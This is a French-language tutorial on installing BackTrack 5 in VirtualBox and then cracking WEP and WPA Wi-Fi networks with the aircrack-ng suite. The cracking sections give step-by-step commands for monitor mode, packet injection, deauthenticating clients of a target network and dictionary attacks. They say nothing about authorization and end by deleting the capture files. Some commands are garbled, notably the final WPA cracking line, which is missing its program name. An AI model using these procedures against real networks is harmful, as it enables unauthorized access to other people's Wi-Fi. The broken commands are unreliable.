Compatibilité matérielle avec BackTrack
Pour savoir si votre carte/clé Wifi est compatible avec BackTrack 5, si elle est
compatible mode moniteur et injection et comment l’installer si besoin, visiter ce
lien :
http://wiki.backtrack-fr.net/index.php/Compatibilit%C3%A9_Mat%C3%A9rielle
Installation et configuration de Backtrack 5 sous VirtualBox I/ Téléchargement -Télécharger la dernière version de VirtualBox depuis cette page http://www.virtualbox.org/wiki/Downloads
- Télécharger l’ISO de Backtrack 5 depuis ce lien http://www.backtrack-linux.org/downloads/ Choisir la version GNOME 64bit de préférence (le mode de téléchargement importe peu).
II/ Configuration de VirtualBox - Installer normalement VirtualBox sur votre ordinateur - Lancer VirtualBox et lancer la création d’une nouvelle machine virtuelle avec le bouton Créer
- Cliquer sur Suivant - Entrer le nom de la machine virtuelle (Backtrack 5, par exemple)
- Système d’exploitation : Linux - Version : Ubuntu (64bit)
- Cliquer sur Suivant
- Assigner à la machine virtuelle environ 30% de la RAM de votre ordinateur.
- Cliquer sur Suivant - Cocher Disque dur d’amorçage - Sélectionner Créer un nouveau disque dur
- Cliquer sur Suivant - Cliquer sur Suivant
- Sélectionner Fichier de taille variable (C’est le meilleur choix si vous ne voulez pas attendre ou que vous êtes limités sur votre disque dur) - Cliquer sur Suivant - Faites glisser le curseur pour régler la taille maximale du disque virtuel (Je conseille 20Go au minimum si vous voulez pouvoir y travailler un minimum) - Cliquer sur Suivant - Cliquer sur Terminer
Vous devriez avoir quelque chose qui ressemble à ceci :
- Cliquer sur Terminer Note : Nous travaillerons sur la machine nommée BT5-1
- Cliquer sur Configuration - Aller dans Stockage
- Cliquer sur l’icône en forme de disque avec un + - Sélectionner Ajouter un lecteur CD/DVD
- Cliquer sur Choisir un disque
- Sélectionner l’ISO de Backtrack 5 que vous avez téléchargé - Aller dans Affichage - Régler la Mémoire Vidéo à 64Mo minimum
- Cliquer sur OK
III/Installation de Backtrack 5
- Cliquer sur Démarrer pour lancer la machine virtuelle - Au tout début appuyer sur Entrée si la machine n’évolue pas - Sélectionner BackTrack Text
- Quand une console apparaît, taper :
root@root:~# stqrtx
Note : Il faut normalement taper startx mais le clavier est par défaut en Qwerty - Lancer l’installation de BackTrack par l’icône sur le bureau
Attention : Il faut être conencté à internet pour finaliser l’installation
- Sélectionner la langue (ici Français), le fuseau horaire (ici, France) - Laisser le clavier sur Option suggérée s’il est bien configuré (on peut tester le clavier dans la zone en bas de la fenètre)
- Pour l’étape 4 ne rien toucher et cliquer sur Suivant - Cliquer sur Installer et patienter le temps de l’installation
Note : Il se peut que l’installation reste un peu bloquée à 99%, c’est normal, le système télécharge et installe des fichiers depuis internet
- Une fois l’installation terminée, éteindre BackTrack 5 - Aller dans Configuration � Stockage
- Dans le menu déroulant Contrôleur IDE, sélectionner l’ISO de BackTrack 5 et sélectionner Supprimer le périphérique
- Démarrer BackTrack 5 (cf fichier Démarrer BT5) -Ouvrir une console (icône en haut, à gauche de System) - Téléchargeons VBox Guest Addon :
root@bt:~# wget http://download.virtualbox.org/virtualbox/4.0.8/VBo xGuestAdditions_4.0.8.iso
- Aller dans Places � Computer � File System - Créer un nouveau dossier (New Folder) nommé : a
- Installons VBox Guest Addon : root@bt:~# mount –o loop VBoxGuestAdditions_4.0.8.iso /a root@bt:~# cd /a root@bt:~# chmod a+x VBoxLinuxAdditions.run root@bt:~# ./VBoxLinuxAdditions.run
- Redémarrer
Ca y est, BackTrack 5 est opérationnel sous VirtualBox !
Démarrer BackTrack 5
Une fois que BackTrack a été installé la procédure pour les commandes pour le
démarrage sont les suivantes :
bt login : root
password : toor (le mot de passe ne s’affiche pas) root@bt:~# startx
Utiliser un périphérique USB pour Backtrack 5 sous
VirtualBox
Il est important de noter qu’un périphérique connecté à la machine virtuelle est
déconnecté de votre propre ordinateur.
Prenons l’exemple d’une clé USB que nous voulons connecter à BackTrack, pour y
placer une wordlist par exemple.
Ce tuto est aussi valable pour une clé USB-Wifi ou une mini antenne Wifi
connectée par USB.
- Connecter la clé USB à votre ordinateur
- Lancer VirtualBox et aller dans les Configurations de la machine cible
- Aller dans l’onglet USB
- Cliquer sur la prise USB avec un +
- Sélectionner le périphérique que vous voulez connecter à BackTrack
(Vérifier qu’il soit bien coché dans la liste Filtres Périphériques USB)
-Lancer BackTrack
Si le périphérique n’est pas accessible sous Backtrack :
- Cliquer sur Périphériques � Périphériques USB
- Vérifier si ledit périphérique est bien coché
- Si ce n’est pas le cas, le cliquer
Cracker un réseau Wifi WEP Ce tutorial nécessite une installation de Backtrack 5 ainsi qu’une carte/clé Wifi
correctement installé sous BackTrack 5 et compatible mode moniteur et injection (cf. Compatibilité matérielle).
Suivre les instructions suivantes :
Ouvrir une console root@bt:~# airmon-ng
Repérer le nom votre carte/clé wifi, ici
wlan0, nous allons démarrer le mode moniteur
root@bt:~# airmon-ng start wlan0
Notez que le mode moniteur est activé
sous mon0
root@bt:~# airodump-ng mon0
On suit l’évolution des réseaux wifi disponibles. Une fois que vous pensez que
vous avez tous les réseaux possibles (attendez 5-10s) appuyez sur Ctrl+C pour arrêter le processus.
Sélectionner le BSSID du réseau cible �
Clique droit � Copy Repérer le CHANNEL de la cible (entre 1 et 13)
root@bt:~# airodump-ng –w wep –c CHANNEL –b BSSID mon0
Le texte en vert est à remplacer par les
informations de la cible
Ouvrir un nouveau terminal
root@bt:~# aireplay-ng -1 0 –a BSSID mon0
Ouvrir un nouveau terminal
root@bt:~# aireplay-ng -3 –b BSSID mon0
Ouvrir un nouveau terminal
root@bt:~# dir
Nous vérifions la presence du fichier wep-
01.cap root@bt:~# aircrack-ng wep-01.cap
Pour lancer cette commande il faut avoir un nombre suffisant de Data (5000-10000) sur le réseau cible, laisser tout tourner jusqu’à ce que la clé soit trouvée (une clé WEP est composée de 10 caractères hexadécimaux de
la forme : xx:xx:xx:xx:xx). Sélectionner la cible si demandé.
Cela peut prendre de 3min à 1h, selon le trafic sur le réseau cible. Une fois que vous avez la clé, sauvegardez-là quelque part. Arrêter tous les processus et fermer les consoles.
Aller dans Places � Home Folder Supprimer tous les fichiers nommés wep-01 (quelque soit l’extension).
Cracker un réseau Wifi WPA
Ce tutorial nécessite une installation de Backtrack 5 ainsi qu’une carte/clé Wifi correctement installé sous BackTrack 5, compatible mode moniteur et injection (cf. Compatibilité matérielle) et une wordlist/dictionnaire préalablement copié sur le bureau,
de préférence de la langue de la cible (ici Français). Suivre les instructions suivantes :
Ouvrir une console root@bt:~# airmon-ng
Repérer le nom votre carte/clé wifi, ici wlan0, nous allons démarrer le mode moniteur
root@bt:~# airmon-ng start wlan0
Notez que le mode moniteur est activé
sous mon0
root@bt:~# airodump-ng mon0
On suit l’évolution des réseaux wifi disponibles. Une fois que vous pensez que
vous avez tous les réseaux possibles (attendez 5-10s) appuyez sur Ctrl+C pour
arrêter le processus. Noter le BSSID, le ESSID et le CHANNEL
de la cible. Noter aussi la STATION associée au BSSID cible.
Attention : Il est nécessaire d’avoir une STATION connectée pour réaliser la suite ! Sinon les deauth seront inefficaces
root@bt:~# airodump-ng –c CHANNEL –w wpa –b BSSID --ivs mon0
Le texte en vert est à remplacer par les informations de la cible
Ouvrir un nouveau terminal
Nous allons lancer une désauthentification à la cible afin d’obtenir le handshake, relancer cette commande plusieurs fois si
nécessaire. Si vous n’avez toujours pas de handshake, attendez qu’il y ait un minimum de trafic sur la cible.
3 commandes équivalentes sont alors possibles : root@bt:~# aireplay-ng -0 1 –e ESSID mon0 root@bt:~# aireplay-ng -0 1 –a BSSID mon0 root@bt:~# aireplay-ng -0 1 –a BSSID –c STATION mon0
Il est possible de remplacer le 1 par n’importe quel nombre ce qui changera le nombre de
désauthentification (attention 0 envoie des dehaut à l’infini –Ctrl+C pour arrêter-).
Une fois le handshake obtenu, vérifions la présence de wpa-01.ivs root@bt:~# dir
Nous allons maintenant laisser faire la wordlist (ou dictionnaire) root@bt:~# -w /root/Desktop/ NOMDUDICO wpa-01.ivs
Ici le dictionnaire se nomme wpalist.txt (ne pas oublier l’extension !)
Attendre que le dictionnaire ait trouvé la clé… Si le dictionnaire que vous avez utilisez n’a pas été efficace, essayez en un autre, etc…
Une fois la clé trouvée et notée, arrêter toutes les consoles et les fermer. Aller dans Places � Home Folder Supprimer tous les fichiers wpa-01.ivs